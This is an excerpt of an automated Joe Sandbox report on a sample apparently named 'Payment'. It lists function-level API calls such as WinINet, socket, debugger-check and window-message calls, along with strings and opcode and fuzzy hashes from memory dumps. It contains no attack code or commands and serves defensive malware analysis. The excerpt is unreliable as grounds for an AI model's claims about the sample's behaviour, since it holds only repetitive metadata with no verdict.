                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: InfoItemMenu_memset
                                                          • String ID: 0
                                                          • API String ID: 2223754486-4108050209
                                                          • Opcode ID: 7a4111c2d8893d19e762a764e31ba8f25d83a7adab19ac149261e31de0286c25
                                                          • Instruction ID: 1eaa6717e6d699d7d45fe950b31394a71531ea896efffafcf8483ef34d5bb8e5
                                                          • Opcode Fuzzy Hash: 7a4111c2d8893d19e762a764e31ba8f25d83a7adab19ac149261e31de0286c25
                                                          • Instruction Fuzzy Hash: 4511C432941224ABDF21DB58DC85BA977F9EB05350F2440F6F854A72A0DBB0EE04C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B42520
                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B42549
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Internet$OpenOption
                                                          • String ID: <local>
                                                          • API String ID: 942729171-4266983199
                                                          • Opcode ID: f781b8377bf9a780f1adb449ebc4b49b5bddec841faa934959a8bc8e935633a0
                                                          • Instruction ID: 8c6f0c9fa1919a973b696009539d177f0e48517d3667f148b440702a035ad3e3
                                                          • Opcode Fuzzy Hash: f781b8377bf9a780f1adb449ebc4b49b5bddec841faa934959a8bc8e935633a0
                                                          • Instruction Fuzzy Hash: 7D11A070501225BADB249F518C99EBBFFE8FF26751F5081AAFA0547140D6B06A81FAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B4830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00B480C8,?,00000000,?,?), ref: 00B48322
                                                          • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B480CB
                                                          • htons.WSOCK32(00000000,?,00000000), ref: 00B48108
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                                          • String ID: 255.255.255.255
                                                          • API String ID: 2496851823-2422070025
                                                          • Opcode ID: e433f26238989dd841e53ae6da53672aa9ab6668024a98648c47e2563297013d
                                                          • Instruction ID: 260f4c9709359caa3022a31f401a2dfc2443be0e6e536180a62228c32d2eca2b
                                                          • Opcode Fuzzy Hash: e433f26238989dd841e53ae6da53672aa9ab6668024a98648c47e2563297013d
                                                          • Instruction Fuzzy Hash: 6C11CE34600305ABDB20AF64CC86FBDB3A4EF08320F1085A7EA11A7291DB72A901D695
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B29355
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: e826014aa748d272a6536cb5f96110d38d3fe0230ae80d707b8dc8886336591a
                                                          • Instruction ID: 61f0ecd3b12a55875886ffcfd9766f5b183fd45abdc8a9df7e140f8cbbf6287f
                                                          • Opcode Fuzzy Hash: e826014aa748d272a6536cb5f96110d38d3fe0230ae80d707b8dc8886336591a
                                                          • Instruction Fuzzy Hash: 84019271A05225AB8B05EB64DC91DFE77A9FF06320B14069AF836573E1DF315908C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B2924D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 9f28f514ec417798a1e363e8a41f6c1ff926a587e25eadab4a70e9bfa2e1c141
                                                          • Instruction ID: 50ed2a88072883f8d62f269e8000bc1ddc4ea626dab2126859a4eac8560c6af4
                                                          • Opcode Fuzzy Hash: 9f28f514ec417798a1e363e8a41f6c1ff926a587e25eadab4a70e9bfa2e1c141
                                                          • Instruction Fuzzy Hash: 1101D471A41225BBCB19EBA0D992EFF73E8DF05300F14019AB91A63291EE105E0CC261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD7F41: _memmove.LIBCMT ref: 00AD7F82
                                                            • Part of subcall function 00B2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00B2B0E7
                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B292D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameSend_memmove
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 372448540-1403004172
                                                          • Opcode ID: 2df3abccd6cc16a35938b0c2c34ca4b93a0fe397d11f8d10360c6bbdfe146bb1
                                                          • Instruction ID: 25d9584cc830a684968013ed527572d800a701986d4c2752e909ffa397605d45
                                                          • Opcode Fuzzy Hash: 2df3abccd6cc16a35938b0c2c34ca4b93a0fe397d11f8d10360c6bbdfe146bb1
                                                          • Instruction Fuzzy Hash: E001A271A41229B7CF15EBA0D982EFF77EC9F15340F280196B81A63292DA215E0CD271
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp
                                                          • String ID: #32770
                                                          • API String ID: 2292705959-463685578
                                                          • Opcode ID: 4c7c3fc1c001ef8077159fcb7dc9fddc0b910aac3c715766ffa42d3c6338c0d5
                                                          • Instruction ID: c43ac789a0cad316b48cd8b753f39728e5ada93e4bc65f9c79790469f6c33ddf
                                                          • Opcode Fuzzy Hash: 4c7c3fc1c001ef8077159fcb7dc9fddc0b910aac3c715766ffa42d3c6338c0d5
                                                          • Instruction Fuzzy Hash: 0EE02232A0022D2AE720AA99AC09BA7F7ECEB45721F0000ABF910D3050E9609A048BE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B281CA
                                                            • Part of subcall function 00AF3598: _doexit.LIBCMT ref: 00AF35A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Message_doexit
                                                          • String ID: AutoIt$Error allocating memory.
                                                          • API String ID: 1993061046-4017498283
                                                          • Opcode ID: cd87f3203a3ba3498a7714b447ceb38beca9a0eb7925ecb0ca9ef2306bd9ba58
                                                          • Instruction ID: dbe2919772f2e0503b0c4b8e4af2276018e7ace6477e2fc51a30f1e572d89b10
                                                          • Opcode Fuzzy Hash: cd87f3203a3ba3498a7714b447ceb38beca9a0eb7925ecb0ca9ef2306bd9ba58
                                                          • Instruction Fuzzy Hash: 49D05B323C631C36D61432E86D07FDA75C88B19B52F044466BB09695E38ED5599182D9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B0B564: _memset.LIBCMT ref: 00B0B571
                                                            • Part of subcall function 00AF0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00B0B540,?,?,?,00AD100A), ref: 00AF0B89
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,00AD100A), ref: 00B0B544
                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00AD100A), ref: 00B0B553
                                                          Strings
                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00B0B54E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                          • API String ID: 3158253471-631824599
                                                          • Opcode ID: efffdd2fafeda921104f8fdc656801c8219fc095dcc2b2ae37d81a1548098a18
                                                          • Instruction ID: 5f6e2386053e133ac3cb05c1a2953dfe2e5057a8d22542761b5a3d9627e4376c
                                                          • Opcode Fuzzy Hash: efffdd2fafeda921104f8fdc656801c8219fc095dcc2b2ae37d81a1548098a18
                                                          • Instruction Fuzzy Hash: 18E06DB06007118FD720DF28E914B56BBE0AB14745F00C9EDE456C37A1EBB4D404CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B55BF5
                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B55C08
                                                            • Part of subcall function 00B354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B3555E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: FindMessagePostSleepWindow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 529655941-2988720461
                                                          • Opcode ID: 6800b88e6fdb6d93723f0b5a9fa37443aec5b18696ca4670630ae220174e57b9
                                                          • Instruction ID: e74116d9577ad6b29fc02e52eb150fc0d437df907f148d636cb6bd4c0fd10348
                                                          • Opcode Fuzzy Hash: 6800b88e6fdb6d93723f0b5a9fa37443aec5b18696ca4670630ae220174e57b9
                                                          • Instruction Fuzzy Hash: 4DD0C931398312B7E778BB70AC4FFA7AA54AB15B52F1408A5B745AB1E0D9E45840C650
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%